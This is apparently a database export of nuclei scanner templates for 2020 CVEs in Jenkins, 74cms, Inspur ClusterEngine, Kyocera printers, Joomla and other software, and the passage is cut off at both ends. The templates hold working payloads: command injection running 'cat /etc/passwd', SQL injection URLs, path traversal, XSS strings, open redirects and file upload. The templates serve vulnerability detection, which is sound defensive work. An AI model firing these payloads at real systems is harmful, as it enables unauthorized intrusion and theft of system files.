"66477a413521042ccf3081c0" }, "name": "CVE-2020-2103.yaml", "content": "id: CVE-2020-2103\n\ninfo:\n name: Jenkins <=2.218 - Information Disclosure\n author: c-sh0\n severity: medium\n description: Jenkins through 2.218, LTS 2.204.1 and earlier, is susceptible to information disclosure. An attacker can access exposed session identifiers on a user detail object in the whoAmI diagnostic page and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the Jenkins server.\n remediation: |\n Upgrade Jenkins to a version higher than 2.218 to mitigate the vulnerability.\n reference:\n - https://www.jenkins.io/security/advisory/2020-01-29/#SECURITY-1695\n - https://jenkins.io/security/advisory/2020-01-29/#SECURITY-1695\n - http://www.openwall.com/lists/oss-security/2020/01/29/1\n - https://nvd.nist.gov/vuln/detail/CVE-2020-2103\n - https://access.redhat.com/errata/RHBA-2020:0402\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-2103\n cwe-id: CWE-200\n epss-score: 0.00534\n epss-percentile: 0.76681\n cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*\n metadata:\n max-request: 2\n vendor: jenkins\n product: jenkins\n shodan-query: http.favicon.hash:81586312\n tags: cve,cve2020,jenkins\n\nhttp:\n - raw:\n - |\n GET {{BaseURL}}/whoAmI/ HTTP/1.1\n Host: {{Hostname}}\n - |\n GET {{BaseURL}}/whoAmI/ HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'text/html'\n - 'x-jenkins'\n case-insensitive: true\n condition: and\n\n - type: word\n part: body_2\n words:\n - 'Cookie'\n - 'SessionId: null'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: kval\n kval:\n - x_jenkins\n# digest: 
490a0046304402204719e69a3d9212bc5a83bc0637aa260c0f1a472289337a06a0795d661772b79a02203d747ba49dfc9831db6ee04e4a534db4d514e8afd98b86e178e116bf4de12837:922c64590222798bb761d5b6d8e72950", "hash": "98b1a5a5eaf74bee6e7c77fb61919aea", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081c1" }, "name": "CVE-2020-21224.yaml", "content": "id: CVE-2020-21224\n\ninfo:\n name: Inspur ClusterEngine 4.0 - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: Inspur ClusterEngine V4.0 is suscptible to a remote code execution vulnerability. A remote attacker can send a malicious login packet to the control server.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches or updates provided by Inspur to mitigate this vulnerability.\n reference:\n - https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul\n - https://nvd.nist.gov/vuln/detail/CVE-2020-21224\n - https://github.com/NS-Sp4ce/Inspur/\n - https://github.com/SexyBeast233/SecBooks\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-21224\n cwe-id: CWE-88\n epss-score: 0.04664\n epss-percentile: 0.92423\n cpe: cpe:2.3:a:inspur:clusterengine:4.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: inspur\n product: clusterengine\n tags: cve2020,cve,clusterengine,rce,inspur\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/login\"\n\n body: |\n op=login&username=;`cat /etc/passwd`&password=\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n Referer: \"{{Hostname}}/module/login/login.html\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
4a0a00473045022034c78c5214c182a891935aaea308b6e385207896bbf1e29aa5584b684156c624022100d8ce75817e295f76723a1f55b29e95769cea4ae6171cd1b4b162a8f2a7bd5cfa:922c64590222798bb761d5b6d8e72950", "hash": "199684985be3b736d03020177eee7c06", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081c2" }, "name": "CVE-2020-2140.yaml", "content": "id: CVE-2020-2140\n\ninfo:\n name: Jenkin Audit Trail <=3.2 - Cross-Site Scripting\n author: j3ssie/geraldino2\n severity: medium\n description: Jenkins Audit Trail 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade to the latest version of Jenkin Audit Trail (>=3.3) which includes a fix for this vulnerability.\n reference:\n - https://www.jenkins.io/security/advisory/2020-03-09/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-2140\n - https://jenkins.io/security/advisory/2020-03-09/#SECURITY-1722\n - http://www.openwall.com/lists/oss-security/2020/03/09/1\n - https://github.com/merlinepedra25/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-2140\n cwe-id: CWE-79\n epss-score: 0.00181\n epss-percentile: 0.54462\n cpe: cpe:2.3:a:jenkins:audit_trail:*:*:*:*:*:jenkins:*:*\n metadata:\n max-request: 2\n vendor: jenkins\n product: audit_trail\n framework: jenkins\n tags: cve,cve2020,jenkins,xss,plugin\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample\"\n - \"{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n -

    sample\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022067a92ac8b7c22a4e10a1ee56656b6be594ea35020ea4799e5af8d2eef94cbbb102204d477f10be4ca3adbda2c9b72bb5526b256b068fcfe7e18923bea002242295d6:922c64590222798bb761d5b6d8e72950", "hash": "8c10f805d12fd8a2b10db498f4ca4c40", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081c3" }, "name": "CVE-2020-22208.yaml", "content": "id: CVE-2020-22208\n\ninfo:\n name: 74cms - ajax_street.php 'x' SQL Injection\n author: ritikchaddha\n severity: critical\n description: |\n SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the underlying database.\n remediation: |\n Apply the vendor-provided patch or update to the latest version of 74cms to mitigate the SQL Injection vulnerability.\n reference:\n - https://github.com/blindkey/cve_like/issues/10\n - https://nvd.nist.gov/vuln/detail/CVE-2020-22208\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-22208\n cwe-id: CWE-89\n epss-score: 0.19578\n epss-percentile: 0.9585\n cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: 74cms\n product: 74cms\n shodan-query: http.html:\"74cms\"\n fofa-query: app=\"74cms\"\n tags: cve2020,cve,74cms,sqli\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11�%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#'\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n# digest: 4b0a00483046022100b445b86b8bc851dfc73d48b1385c99d7ad711230fa56e43efd02d7755d29ea84022100bfc90c7ba695df767a9f32c5eb3a29bf895e0af68b1d4c163438eaf8bfc221b3:922c64590222798bb761d5b6d8e72950", "hash": 
"22a4d1e02d2c9c4629e1e67f151cf5e4", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081c4" }, "name": "CVE-2020-22209.yaml", "content": "id: CVE-2020-22209\n\ninfo:\n name: 74cms - ajax_common.php SQL Injection\n author: ritikchaddha\n severity: critical\n description: |\n SQL Injection in 74cms 3.2.0 via the query parameter to plus/ajax_common.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the underlying database.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_common.php file.\n reference:\n - https://github.com/blindkey/cve_like/issues/12\n - https://nvd.nist.gov/vuln/detail/CVE-2020-22209\n - https://github.com/20142995/sectool\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-22209\n cwe-id: CWE-89\n epss-score: 0.15522\n epss-percentile: 0.95775\n cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: 74cms\n product: 74cms\n shodan-query: http.html:\"74cms\"\n fofa-query: app=\"74cms\"\n tags: cve,cve2020,74cms,sqli\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%錦%27%20union%20select%201,md5({{num}}),3%23%27'\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n# digest: 4a0a004730450221009e55b332e27a60cf87cccd81422880062f90e44d254777bb1ec7f9140fa0054502205fddccf82cfe56707866b8766e8b74347aef1bf754927ccb40079bb273c5b359:922c64590222798bb761d5b6d8e72950", "hash": "37632688afad5787a005c2e7aacca07c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081c5" }, "name": "CVE-2020-22210.yaml", "content": "id: CVE-2020-22210\n\ninfo:\n 
name: 74cms - ajax_officebuilding.php SQL Injection\n author: ritikchaddha\n severity: critical\n description: |\n A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_officebuilding.php file.\n reference:\n - https://github.com/blindkey/cve_like/issues/11\n - https://nvd.nist.gov/vuln/detail/CVE-2020-22210\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-22210\n cwe-id: CWE-89\n epss-score: 0.20254\n epss-percentile: 0.95933\n cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: 74cms\n product: 74cms\n shodan-query: http.html:\"74cms\"\n fofa-query: app=\"74cms\"\n tags: cve,cve2020,74cms,sqli\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23'\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n# digest: 4a0a00473045022100871fd309f948d3202f0de9e37571c921c7c90656777d3fd15ab38733ad2408c102204f62211c931f9e30ab1ff0bf20bb503191ed0af758f8fe2b0373f48ec8bcd315:922c64590222798bb761d5b6d8e72950", "hash": "46543fb068f149cdab68814dd4e340b1", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081c6" }, "name": "CVE-2020-22211.yaml", "content": "id: CVE-2020-22211\n\ninfo:\n name: 74cms - ajax_street.php 'key' SQL Injection\n author: ritikchaddha\n severity: critical\n description: |\n SQL Injection in 74cms 3.2.0 via the key parameter to 
plus/ajax_street.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 'key' parameter of ajax_street.php in 74cms.\n reference:\n - https://github.com/blindkey/cve_like/issues/13\n - https://nvd.nist.gov/vuln/detail/CVE-2020-22211\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-22211\n cwe-id: CWE-89\n epss-score: 0.20254\n epss-percentile: 0.95933\n cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: 74cms\n product: 74cms\n shodan-query: http.html:\"74cms\"\n fofa-query: app=\"74cms\"\n tags: cve,cve2020,74cms,sqli\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23'\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n# digest: 490a00463044022071b6a405d90f0054834aa1c5c3703f7bcb45b4f903a6bc652d448f4538db822a02200b1db00826ae2aff686f2d3c41ac214901596ef82ccf7dd22d40e04364765372:922c64590222798bb761d5b6d8e72950", "hash": "ae89d0837ebe0c530903030a6d8fab79", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081c7" }, "name": "CVE-2020-22840.yaml", "content": "id: CVE-2020-22840\n\ninfo:\n name: b2evolution CMS <6.11.6 - Open Redirect\n author: geeknik\n severity: medium\n description: b2evolution CMS before 6.11.6 contains an open redirect vulnerability via the redirect_to parameter in email_passthrough.php. 
An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n This vulnerability can be exploited by attackers to trick users into visiting malicious websites, potentially leading to phishing attacks, malware infections, or unauthorized access to sensitive information.\n remediation: |\n Upgrade b2evolution CMS to version 6.11.6 or later to mitigate the open redirect vulnerability (CVE-2020-22840).\n reference:\n - https://github.com/b2evolution/b2evolution/issues/102\n - http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html\n - https://www.exploit-db.com/exploits/49554\n - https://nvd.nist.gov/vuln/detail/CVE-2020-22840\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-22840\n cwe-id: CWE-601\n epss-score: 0.01043\n epss-percentile: 0.82334\n cpe: cpe:2.3:a:b2evolution:b2evolution:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: b2evolution\n product: b2evolution\n tags: cve,cve2020,packetstorm,edb,redirect,b2evolution\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$'\n# digest: 4b0a00483046022100aca101d54608e4e381651f80543d9c794c8e167de5bccd3a26b0fc1482f400880221009b0b916ed079773a3de491811b7feec2d0605abf868ef138cadb557821e59d36:922c64590222798bb761d5b6d8e72950", "hash": "cab135b8d197157108e77695b11ca04f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081c8" }, "name": "CVE-2020-23015.yaml", "content": "id: CVE-2020-23015\n\ninfo:\n name: OPNsense <=20.1.5 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: OPNsense through 20.1.5 
contains an open redirect vulnerability via the url redirect parameter in the login page, which is not filtered. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to redirect users to malicious websites, leading to phishing attacks or the disclosure of sensitive information.\n remediation: |\n Upgrade OPNsense to a version higher than 20.1.5 to mitigate the vulnerability.\n reference:\n - https://github.com/opnsense/core/issues/4061\n - https://nvd.nist.gov/vuln/detail/CVE-2020-23015\n - https://github.com/anonymous364872/Rapier_Tool\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-23015\n cwe-id: CWE-601\n epss-score: 0.00179\n epss-percentile: 0.54178\n cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: opnsense\n product: opnsense\n tags: cve2020,cve,redirect,opnsense\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?url=http://interact.sh'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$'\n# digest: 4a0a00473045022100ae77234850dda3e92b7d3c070dd3f65e32ec805f1ebe87e6bf894a33e0bcee1802201e520db0d31b87bd98524bf3edc556e65db0ce4929df90d482ddf582fe4457b7:922c64590222798bb761d5b6d8e72950", "hash": "eebd91387c78e2d7ede01df3079a0c1f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081c9" }, "name": "CVE-2020-23517.yaml", "content": "id: CVE-2020-23517\n\ninfo:\n name: Aryanic HighMail (High CMS) - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and 
before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.\n reference:\n - https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-23517\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n - https://github.com/d4n-sec/d4n-sec.github.io\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-23517\n cwe-id: CWE-79\n epss-score: 0.00132\n epss-percentile: 0.47292\n cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: aryanic\n product: high_cms\n shodan-query: title:\"HighMail\"\n fofa-query: title=\"HighMail\"\n tags: cve,cve2020,xss,cms,highmail,aryanic\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E\"\n - \"{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'value=\"\">'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b35fbfad637dec46e02dd52e3937c9a7946b832a92b5a742cda3d4a51e77d0ec02207e01bdf1cc3c1558864bc97d6685f1c982f8ecf5c977021caae8a5c017963601:922c64590222798bb761d5b6d8e72950", "hash": "ffe2389a229ebdbd51532fec1789f070", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf3081ca" }, "name": "CVE-2020-23575.yaml", "content": "id: CVE-2020-23575\n\ninfo:\n name: Kyocera Printer d-COPIA253MF - Directory Traversal\n author: 0x_Akoko\n severity: high\n description: Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.\n remediation: |\n Apply the latest firmware update provided by Kyocera to fix the directory traversal vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/48561\n - https://nvd.nist.gov/vuln/detail/CVE-2020-23575\n - https://www.kyoceradocumentsolutions.com.tr/tr.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-23575\n cwe-id: CWE-22\n epss-score: 0.01489\n epss-percentile: 0.85494\n cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: kyocera\n product: d-copia253mf_plus_firmware\n tags: cve2020,cve,printer,iot,lfi,edb,kyocera\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"root:.*:0:0:\"\n - \"bin:.*:1:1\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205f12eef681cfdc5b25284c5454a90ded2df8a57c3ce88dc0b02c875889c55b3d022024a97cc9f5593bc334188272f41626107d090fd8b46cc923f55db4fecd61205f:922c64590222798bb761d5b6d8e72950", "hash": "7d8c1e78047618ad7fa2fc6f12b12e11", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081cb" }, "name": "CVE-2020-23697.yaml", "content": "id: CVE-2020-23697\n\ninfo:\n name: 
Monstra CMS 3.0.4 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the page feature in admin/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of Monstra CMS or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://github.com/monstra-cms/monstra/issues/463\n - https://nvd.nist.gov/vuln/detail/CVE-2020-23697\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-23697\n cwe-id: CWE-79\n epss-score: 0.0009\n epss-percentile: 0.37812\n cpe: cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: monstra\n product: monstra_cms\n tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated,monstra\nvariables:\n string: \"{{to_lower('{{randstr}}')}}\"\n\nhttp:\n - raw:\n - |\n POST /admin/index.php?id=dashboard HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n login={{username}}&password={{password}}&login_submit=Log+In\n - |\n GET /admin/index.php?id=pages&action=add_page HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n - |\n POST /admin/index.php?id=pages&action=add_page HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
csrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15\n - |\n GET /{{string}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(header_4, \"text/html\")'\n - 'status_code_4 == 200'\n - 'contains(body_4, \">\") && contains(body_4, \"Monstra\")'\n condition: and\n\n extractors:\n - type: regex\n name: csrf\n group: 1\n regex:\n - 'id=\"csrf\" name=\"csrf\" value=\"(.*)\">'\n internal: true\n part: body\n# digest: 490a004630440220388c291d21538ae9468cbf1003d57432e845e76f6e5ca57401c295990dbfa3c802201e068fb257170a9fd9eb666b68ebba98a088c87a3f79ab04d71631a4170816d9:922c64590222798bb761d5b6d8e72950", "hash": "f152946d8d5eec8753a8dc52622b556a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081cc" }, "name": "CVE-2020-23972.yaml", "content": "id: CVE-2020-23972\n\ninfo:\n name: Joomla! Component GMapFP 3.5 - Arbitrary File Upload\n author: dwisiswant0\n severity: high\n description: |\n Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application\n without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected Joomla! website.\n remediation: |\n Apply the latest security patch or update to a patched version of Joomla! 
Component GMapFP 3.5 to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/49129\n - https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md\n - http://packetstormsecurity.com/files/159072/Joomla-GMapFP-J3.5-J3.5F-Arbitrary-File-Upload.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-23972\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-23972\n cwe-id: CWE-434\n epss-score: 0.53621\n epss-percentile: 0.9756\n cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\\!:*:*\n metadata:\n max-request: 2\n vendor: gmapfp\n product: gmapfp\n framework: joomla\\!\n tags: cve2020,cve,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\\!\nvariables:\n name: \"{{to_lower(rand_text_alpha(5))}}\"\n\nhttp:\n - raw:\n - |\n POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n Referer: {{BaseURL}}\n Connection: close\n\n ------WebKitFormBoundarySHHbUsfCoxlX1bpS\n Content-Disposition: form-data; name=\"option\"\n\n com_gmapfp\n ------WebKitFormBoundarySHHbUsfCoxlX1bpS\n Content-Disposition: form-data; name=\"image1\"; filename=\"{{name}}.html.gif\"\n Content-Type: text/html\n\n projectdiscovery\n\n ------WebKitFormBoundarySHHbUsfCoxlX1bpS\n Content-Disposition: form-data; name=\"no_html\"\n\n no_html\n ------WebKitFormBoundarySHHbUsfCoxlX1bpS--\n\n payloads:\n component:\n - \"com_gmapfp\"\n - \"comgmapfp\"\n\n extractors:\n - type: regex\n regex:\n - \"window\\\\.opener\\\\.(changeDisplayImage|addphoto)\\\\(\\\"(.*?)\\\"\\\\);\"\n part: body\n# digest: 
4b0a00483046022100e63b322ff55fa79a7de810f96ac018fe740ac8632e0532cb83816f0dbe09eab1022100b402ab341d6e7fd5f75477f035b28345da5313727856556e321cf238859fe49a:922c64590222798bb761d5b6d8e72950", "hash": "a99ad8d32cf558235fac4661ad5db8cf", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081cd" }, "name": "CVE-2020-24148.yaml", "content": "id: CVE-2020-24148\n\ninfo:\n name: Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery\n author: dwisiswant0\n severity: critical\n description: WordPress plugin Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 contains a server-side request forgery (SSRF) vulnerability via the data parameter in a moove_read_xml action.\n remediation: |\n Update to the latest version of the Import XML & RSS Feeds WordPress Plugin (2.0.2 or higher) to mitigate the vulnerability.\n reference:\n - https://github.com/dwisiswant0/CVE-2020-24148\n - https://wordpress.org/plugins/import-xml-feed/#developers\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24148\n - https://github.com/secwx/research/blob/main/cve/CVE-2020-24148.md\n - https://github.com/nomi-sec/PoC-in-GitHub\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\n cvss-score: 9.1\n cve-id: CVE-2020-24148\n cwe-id: CWE-918\n epss-score: 0.15451\n epss-percentile: 0.95765\n cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:2.0.1:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: mooveagency\n product: import_xml_and_rss_feeds\n framework: wordpress\n fofa-query: body=\"import-xml-feed\"\n tags: cve,cve2020,wordpress,wp-plugin,ssrf,mooveagency\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/import-xml-feed/readme.txt 